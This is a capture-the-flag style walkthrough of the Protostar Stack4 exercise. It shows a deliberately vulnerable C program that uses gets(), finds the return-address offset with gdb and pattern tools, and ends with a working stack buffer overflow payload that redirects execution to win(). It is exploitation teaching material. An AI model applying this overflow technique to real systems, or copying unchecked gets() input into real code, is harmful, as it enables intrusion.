Protostar - Stack4

You can find the protostar there > Protostar

Let’s check the source code :

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void win() { printf("code flow successfully changed\n"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); }

We have a function win, a variable buffer with 64bytes buffer and the vulnerable function gets

gets -> doesn’t check while getting bytes.

Let’s run the binary.

1 2	user@protostar:/opt/protostar/bin$ ./stack4 pwn

It takes an input, let’s check it is vulnerable.

1 2	user@protostar:/opt/protostar/bin$ python -c 'print "A" * 100' | ./stack4 Segmentation fault

Now let’s find the offset.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

$ ./pattern_create.rb -l 100 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A user@protostar:/opt/protostar/bin$ gdb -q ./stack4 Reading symbols from /opt/protostar/bin/stack4...done. (gdb) r Starting program: /opt/protostar/bin/stack4 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () (gdb) $ ./pattern_offset.rb -q 0x63413563 [*] Exact match at offset 76

Perfect, now let’s find the address of win function.

1 2	user@protostar:/opt/protostar/bin$ objdump -d ./stack4 | grep win 080483f4 <win>:

Let’s make the exploit now.

1 2 3

>>> from pwn import * >>> p32(0x080483f4) b'\xf4\x83\x04\x08'

1 2 3

user@protostar:/opt/protostar/bin$ python -c 'print "A" * 76 + "\xf4\x83\x04\x08"' | ./stack4 code flow successfully changed Segmentation fault